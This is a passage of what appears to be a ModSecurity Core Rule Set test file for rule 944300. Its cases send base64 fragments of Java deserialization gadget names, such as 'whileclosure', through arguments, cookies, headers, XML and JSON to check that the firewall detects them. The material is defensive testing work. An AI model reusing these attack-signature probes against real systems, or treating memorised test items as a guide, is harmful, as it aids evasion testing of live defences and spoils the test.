Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-274 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: 
"POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-275 + desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-276 + desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-277 + desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-278 + desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-279 + desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-280 + desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-281 + desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-282 + desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-283 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + 
version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-284 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-285 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-286 + desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-287 + desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-288 + desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-289 + desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-290 + desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-291 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-292 + desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-293 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-294 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-295 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-296 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-297 + desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-298 + desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-299 + desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-300 + desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-301 + desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + version: 
"HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-302 + desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-303 + desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-304 + desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-305 + desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: 
+ input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-306 + desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-307 + desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-308 + desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-309 + desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-310 + desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-311 + desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-312 + desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-313 + desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-314 + desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
